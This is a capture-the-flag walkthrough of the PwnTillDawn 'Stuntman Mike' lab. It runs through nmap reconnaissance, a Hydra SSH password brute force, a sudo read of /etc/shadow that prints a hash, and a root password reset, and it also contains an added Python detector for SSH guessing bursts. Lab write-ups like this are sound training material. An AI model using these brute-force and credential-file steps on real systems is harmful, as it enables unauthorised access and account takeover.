ptd-stuntmanmike-private

https://online.pwntilldawn.com/Achievements/Details/1/1438


As always, we start with an nmap scan:

┌─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -A 10.150.150.166
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-15 09:59 GMT
Nmap scan report for 10.150.150.166
Host is up (0.032s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 (protocol 2.0)
| ssh-hostkey: 
| 2048 b7:9e:99:ed:7e:e0:d5:83:ad:c9:ba:7c:f1:bc:44:06 (RSA)
| 256 7e:53:59:7b:2d:6c:3b:d7:21:28:cb:cb:78:af:99:78 (ECDSA)
|_ 256 c5:d2:2d:04:f9:69:40:4c:15:34:36:fe:83:1f:f3:44 (ED25519)
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:15:13
|_Not valid after: 2022-10-24T09:15:13

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.55 seconds
┌─[✗]─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #ssh root@10.150.150.166
You are attempting to login to stuntman mike's server - FLAG35=724a2734e80ddbd78b2694dc5eb74db395403360
root@10.150.150.166's password:
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #hydra -l mike -P /usr/share/wordlists/rockyou.txt ssh://10.150.150.166
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-26 11:29:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.150.150.166:22/
[22][ssh] host: 10.150.150.166 login: mike password: babygirl
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-26 11:29:51
┌─[✗]─[root@parrot-virtual]─[/home/user/ptd]
mike@stuntmanmike:~$ cat FLAG36
8cff2cce1a88a54db986d968a4b7a66fb3588c20

mike@stuntmanmike:~$ sudo -l
Matching Defaults entries for mike on stuntmanmike:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on stuntmanmike:
(ALL : ALL) ALL
mike@stuntmanmike:~$ groups
mike adm cdrom sudo dip plugdev lxd
mike@stuntmanmike:~$ sudo cat /etc/shadow
root:*:17941:0:99999:7:::
--snip--
sshd:*:18043:0:99999:7:::
mike:$6$4ytsdVARn//SY.7x$ZNJHsx3CHR3zCU91Q.3RjHDK4hZ72GIT5.n/ygetAZ3Armybjj.l6QMb5PAvidEHvgGRipOcycOTnU8ePzwEl1:18043:0:99999:7:::
splunk:!:18194:0:99999:7:::

mike@stuntmanmike:/$ sudo passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
mike@stuntmanmike:/$ su root
Password:
root@stuntmanmike:/# cd /root
root@stuntmanmike:~# cat FLAG37
28d10397e475a50fc0d6c73f7c23355ebdf15a3f
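
Seen from the defender's side, the hydra run above leaves a burst of failed sshd password attempts followed by one accepted login for mike. The following is an added example, not part of the original write-up: a small parser that flags that pattern in auth.log-style lines. The source addresses, PIDs, ports, thresholds and the function name are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH syslog lines: "<Mon d HH:MM:SS> <host> sshd[pid]: Failed|Accepted password for ..."
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_guessed_logins(lines, min_failures=5, window=timedelta(minutes=5), year=2020):
    """Return (ip, user, failures) for every accepted password login that follows
    at least min_failures failed passwords from the same source IP within window."""
    failures = defaultdict(deque)  # source IP -> timestamps of recent failures
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so the caller supplies one.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        recent = failures[m["ip"]]
        while recent and ts - recent[0] > window:
            recent.popleft()  # forget failures that fell out of the window
        if m["result"] == "Failed":
            recent.append(ts)
        elif len(recent) >= min_failures:
            hits.append((m["ip"], m["user"], len(recent)))
            recent.clear()
    return hits

# Constructed sample: a guessing burst ending in success, then one ordinary typo and retry.
SAMPLE = [
    f"Aug 26 11:29:{45 + i // 2:02d} stuntmanmike sshd[{2101 + i}]: "
    f"Failed password for mike from 10.66.66.10 port {40100 + i} ssh2"
    for i in range(6)
] + [
    "Aug 26 11:29:50 stuntmanmike sshd[2107]: Accepted password for mike from 10.66.66.10 port 40112 ssh2",
    "Aug 26 12:00:00 stuntmanmike sshd[2200]: Failed password for mike from 10.66.66.20 port 50000 ssh2",
    "Aug 26 12:00:09 stuntmanmike sshd[2201]: Accepted password for mike from 10.66.66.20 port 50002 ssh2",
]

if __name__ == "__main__":
    for ip, user, n in find_guessed_logins(SAMPLE):
        print(f"ALERT: {user} logged in from {ip} after {n} failed passwords")
```

Only the first source is reported; the single mistyped password from the second address stays below the threshold.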


However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.

 
